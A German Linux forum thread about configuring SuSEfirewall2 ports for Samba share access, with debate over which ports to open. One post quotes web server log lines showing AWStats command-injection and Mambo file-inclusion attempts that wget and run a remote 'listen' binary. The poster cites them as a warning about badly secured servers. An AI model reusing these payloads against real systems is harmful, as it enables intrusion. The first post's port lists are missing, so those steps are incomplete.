So funktionieren SMB-Freigaben mit SuSEfirewall2

Eigentlich ein Thema das in zwei Foren geposted werden kann: "TCP/IP, Routing, Firewall & Masquerade", sowie "Samba". Ich hab mich mal für das Samba Forum entschieden.

Hier die vorgehensweise zum Konfigurieren der SuSEfirewall2 um auf smb:/ - Freigaben zurückgreifen zu können:

Im Yast2 - Menü unter "Security & Users" -> Firewall auswählen und nach start der Konfigurationsoberfläche im Bereich "Start" die Firewall stoppen. Danach den Bereich "Erlaubte Dienste" aufrufen, dann die Zone auswählen (Standard: "externe Zone") und danach auf "Erweitert" klicken.

Nun unter TCP-Ports UND UDP-Ports folgende Ports angeben:


Danach auf OK klicken, danach auf Weiter und zum Schluss auf Übernehmen klicken.

Jetzt kommt der etwas schwierigere Bereich, den nun muss man mit Root-Rechten (su) im Verzeichnis "/etc/sysconfig/" die Datei "SuSEfirewall2" editieren.
Dann nach der Zeichenkette "FW_ALLOW_INCOMING_HIGHPORTS_UDP" suchen und diese umwandeln in:


Dann nur noch speichern und die Firewall neu starten. Empfohlen wird aber ein Neustart des kompletten Systems, da es vorkommen kann, das der Konquerer keine Netzwerke oder Rechner anzeigt.

Ciao Panzerfather

ein paar Anmerkungen dazu:

Für den Zugriff von Linux auf den Win-Rechner mittels
smb://IPdesWinRechners
ist es NICHT erforderlich das Samba smbd oder nmbd läuft.
Ebenfalls braucht man dafür KEINE Ports in der Firewall EDIT INPUT chain EDIT zu öffnen.
(Samba sollte aber installiert sein, oder bringt KDE eigene Programme zum Zugriff mit????)

Will man
smb://NetBiosNameWinRechner
benutzen muß der nmbd laufen.
Die Firewall sollte eingehend folgende Pakete EDIT ausschließlich aus dem LAN EDIT annehmen:
UDP/137
UDP/138
Eigentlich sollte bei Installation von Samba über Yast die Firewall richtig eingestellt werden.

Will man das Win-Rechner auf Samba-Shares zugreifen, muß der smbd laufen und eingehend TCP/445 geöffnet sein. EDIT nur aus dem LAN EDIT
TCP/139 braucht man nicht für XP, Win2k und Win2003


Ein Neustart des Rechners ist bei Linux nicht erforderlich. Ein Neustart der Dienste, wenn überhaupt erforderlich, ist vollkommen ausreichend.
Das es manchmal so lange dauert liegt am Protokoll und ist kein Samba-Problem, 15 min Wartezeit bis die Windowse sich meldet ist möglich.
Abhilfe schafft hier ein WINS-Server, entweder Samba oder für mehrere 100 EUR einen Windows-Server kaufen.

Das ist so auch nicht ganz richtig, denn wenn man IN und OUT Traffic blockiert, muss man die Ports freigeben!

Ich musste für den Zugriff auf meine Windows Rechner in der SuSEfirewall wie beschrieben vorgehen, ansonsten erhält man im Konqueror eine Fehlermeldung das die Firewall evtl. den Zugriff blockiert. Zumindest ist das unter SuSE Linux OSS so [wohlgemerkt Standard installation]! Zu überprüfen wenn man die Firewall deaktiviert funktioniert der Zugriff!

Dazu vielleicht auch mal hier reinschauen, da wird dieses Problem auch für SuSE Linux 10 OSS beschrieben (mehrere URLs gibts hier im Forum, einfach mal danach suchen). Ich benutze SuSE Linux 10.x Alpha! Ohne Konfig blockiert die Firewall alle Ports von innen und außen, wenn man den Adapter auf "extern" stellt! Probiers doch mal aus! (Ist doch der Vorteil von Linux)

Mit dem Neustart geb ich Dir recht, doch braucht der Konqueror ungewöhnlich lange bis er nach Neustart der Firewall die Freigaben anzeigt! Nach dem Neustart klappte es deutlich schneller!

Ciao Panzerfather

In der OUTPUT chain filtert man normalerweise nicht, also ist da auch nichts zu öffnen. Es würde mich wundern, wenn die Suse Firewall da rumfiltert.
INPUT öffnet man nur für die von mir genannten Ports und ausschließlich für Pakete aus dem LAN.
Du meinst wahrscheinlich FORWARD, da hat ein Samba Server aber nichts zu suchen. Samba ist ausschließlich für ein LAN konzipiert.

Es geht auch nicht darum irgendwelche Einstellungen zu finden in der dann irgendwelche (falschen?) Fehlermeldungen nicht mehr erscheinen.

Ein sicherer und zuverlässiger Rechner basiert auch auf vernünftiger Konfiguration der Dienste.

Ich habe meinen Beitrag noch mal um ein paar Punkte zur Klarstellung ergänzt.

WIr liegen doch gar nicht so weit entfernt mit unseren Beschreibungen:


Samba MUSS NICHT installiert werden, sondern die libsmbclient. Dann kann Konqueror jede smb-Share finden, wenn die Ports konfiguriert sind.


So ähnlich habe ich das doch auch geschrieben, nur das die Netzwerkkarte auf EXTERN geschaltet ist und somit jeden nicht freigegebenen Verkehr abblockt. Will man dann aber mit Konqueror erfolgreich auf die Shares zugreifen, muss man aber die von mir angegebenen Ports öffnen, sowie die Ports > 1024 von außen zulassen, da ein zufälliger Port für die Übertragung genutzt wird.

Warum man alle Ports auf UDP & TCP freigeben muss, bleibt wohl ein geheimnis, da laut Ethereal nur UDP 137 und TCP 445 und ein zufälliger Port > 1024 benutzt werden.
Wie es mit anderen Firewalls und Tools ist, kann ich nicht sagen, denn wie gesagt, es handelt sich nur um eine Beschreibung um eine SuSEfirewall2-Konfiguration für Konqueror gestestet auf OpenSuSE 10.1a4!

PS: Mit IN und OUT meinte ich nur den Eigehenden und Ausgehenden Traffic, und gute Firewalls können beides erledigen, damit kann man nämlich riguros die Viren- und Trojaner-Verbreitung stoppen. Hier ist auch noch ein link der es so ähnlich beschreibt, wenn mich nicht alles täuscht warst Du es sogar der gefragt hat wie man die Firewall konfigurieren kann.

Kde greift auf die libsmbclient zurück, siehe auch man libsmbclient
libsmbclient ist Teil im Paket samba-client enthalten

Samba Ports sind wie schon zuvor geschrieben:
UDP/137, UDP/138 und TCP/445

UDP 138 wird für das browsen benötigt, das kann man nicht weglassen.

Weiteres wird nicht benötigt.
TCP/137 und TCP/138 stammt aus uralten MS Dokos die Du findest, wenn Du danach sucht. KEINE Relevanz für > win2k und Samba 3.

Davon abweichende Einstellungen in den Firewall Regeln sind falsch, bzw. unnötig.

Wenn nach Installieren von Samba und konfigurieren der Firewall durch die Suse-GUI smb:/ im Konquerer nicht geht ist irgendwas/irgendwo kaputt.

Das es nach Deinen Einstellungen funktioniert ist eher ein zufälliges Ergebnis mit eventuellen Nebenwirkungen?

PS: Mit IN und OUT meinte ich nur den Eigehenden und Ausgehenden Traffic, und gute Firewalls können beides erledigen, damit kann man nämlich riguros die Viren- und Trojaner-Verbreitung stoppen.

Zum Vergrößern anklicken....

Ich weiß nicht genau was Du damit sagen willst, aber unter Windows ist der Gebrauch von Zoni-Alarm, Spyware und Symantec ein starker Indikator für die Unkenntnis des Computerbedieners.

... unter Windows ist der Gebrauch von Zoni-Alarm, Spyware und Symantec ein starker Indikator für die Unkenntnis des Computerbedieners.

Zum Vergrößern anklicken....

Ist damit bei Dir ein jeder, der Antivirus SW und eine FW auf seinem WIN Hobel laufen hat ein Unwissender? Kannst Du Deine Aeuesserung bitte ein wenig praezidieren?

Hi framp,

das ist ein Linux-Forum und die SambaRubrik deswegen sollte man die Diskussion hier nicht ausweiten.
Ich wollte das nur nicht so stehenlassen, wenn jemand meint mit Windows und mit einer personal-FW könne man was bewirken.
Im übrigen hatte ich auch ein paar Produktkategorien genannt und es nicht generell auf Scanner und Firewalls bezogen.
Wer Symantec benutzt hat eh den schwarzen Peter gezogen, die meisten Anwender überschätzen die beschränkten Möglichkeiten eines Virenscanners maßlos.
Als Firewall gibt es die MS eigene für XP und Win2003 die für eingehenden Verkehr im Rahmen ihrer Möglichkeiten ausreichend ist. Für Outgoing Traffic kann man IPSecCMD (bei XP verfügbar!) dazu nehmen.
Produkte der Klasse Zoni-Alarm als PopUpAnimation taugen nichts, sind fehleranfällig, einfach zu überlisten und erzeugen zusätzliche Sicherheitslücken.
Gar nicht helfen kann man Benutzer die keine Backup machen, als Privatanwender Updates und Patches nicht zeitnah einspielen (z.B. noch XP mit SP1 benutzen) und statt dem IE nicht den Firefox benutzen, sich dafür aber auf "gefährlichen" Seiten rumtreiben.

Die Zeiten werden auch für Linux-Benutzer härter. Hier ein kleiner Auszug aus meinem LogFile.
Wer seinen Rechner schlampig konfiguriert und ins Internet stellt findet sich dann hier wieder:
http://zone-h.org/en/defacements/filter/filter_defacer=Fatal+Error/page=21/

Ob für Samba zur Zeit Sicherheitslücken vorhanden sind weiß ich nicht, aber ich halte es für falsch in der SuSe Firewall rumzuclicken und damit evtl. den Samba-Server ins Internet zu stellen ohne dieses vorher im Detail geprüft zu haben.

160.75.69.1 - - [16/Dec/2005:16:45:00 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3
bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY
;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
160.75.69.1 - - [16/Dec/2005:16:45:01 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3
bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY
;echo| HTTP/1.1" 200 526669 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
160.75.69.1 - - [16/Dec/2005:16:45:03 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20
%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;ec
ho%20YYY;echo| HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
160.75.69.1 - - [16/Dec/2005:16:45:04 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQU
EST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXXXXXXXX/cmd.gif?&cmd=
cd%20/tmp;wget%XXXXXXXXXXXXX/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 290 "-" "M
ozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1"
160.75.69.1 - - [16/Dec/2005:16:45:05 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUE
ST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http

Frankie777 schrieb:

... aber ich halte es für falsch in der SuSe Firewall rumzuclicken und damit evtl. den Samba-Server ins Internet zu stellen ohne dieses vorher im Detail geprüft zu haben.

Zum Vergrößern anklicken....

ACK. Wer Servies (WEB, FTP, SAMBA, ...) im Internet anbietet sollte schon sehr genau wissen was er tut. SAMBA im Internet halte ich fuer extrem unklug - ausser man benutzt VPNs. 8)

Zur Ursache des Problems siehe:

http://www.linux-club.de/viewtopic.php?t=49021

Ich stelle das ganze mal unter wichtig, und werde die Erweiterungen und Verbesserungen Zusammenfügen, bzw überflüßige Teile rausschmeißen, damit der Suchende schnell zum Ergebnis kommt.

@Yehudi

Ja, das ist sicherlich sinnvoll!

Man sollte auch noch mal rausstellen, dass es das "Problem" mit libsmbclient bei mehr als einer Netzwerke und spezieller Konfiguration der smb.conf gibt.

https://bugzilla.samba.org/show_bug.cgi?id=3336

Und evtl. noch ein Problem bei Suse 10.? bei der Erzeugung der iptables Befehle durch die Suse-Firewall.

http://www.linux-club.de/viewtopic.php?p=276700#276700

Was mich total verrückt macht ist folgende und bessere/sicherere Konfiguration der SuSEFirewall2 (/etc/sysconfig/SuSEfirewall2):

FW_TRUSTED_NETS="x.x.x.x" (für x.x.x.x die IP Adresse des Windows Rechners angeben, verfeinert kann das mit dem freigeben der IP und den zugelassenen Protokollen/Ports)

Ansonsten keine anderen Änderungen vornehmen!

Danach funktioniert aber NICHT NUR der Zugriff auf den angegebenen Rechner, sondern auf das komplette Subnetz! :shock:

Das ist für mich definitiv ein BUG!

huhu

ich werd aus dieser anleitung net schlau

kann das net mal einer verständlich zusammenfassen ?
ohne die ganzen diskusionen dazwischen
okay liegt vielleicht auch daran das ich mich mit linux noch net so sehr auskenne
aba da gibts dann hier anmerkungen dazu und dazu
und da sagt dann einer das das so is und net so
und das das besser is und nich das
ect....

ich kommt da total durcheinander :-(
sorry wenn ich grad nerve
aba so versteh ichs einfach net....
und ich würd das gerne auch ma einrichten
weil alle anderen bei mir im haus windows benutzen

danke schon mal im vorraus....
falls sich jemand die mühe macht
bin auf anfrage auch per pn oder icq erreichbar wenn sich jemand angesprochen fühlt einem noob zu helfen

Werde ich mal demnächst zusammenfassen, Du hast völlig Recht.

edit: Habe die ganzen wichtigen Teile jetzt erst mal zusammengefasst.
http://www.linux-club.de/viewtopic.php?p=308866#308866
Werde es aber noch mehre Male überarbeiten.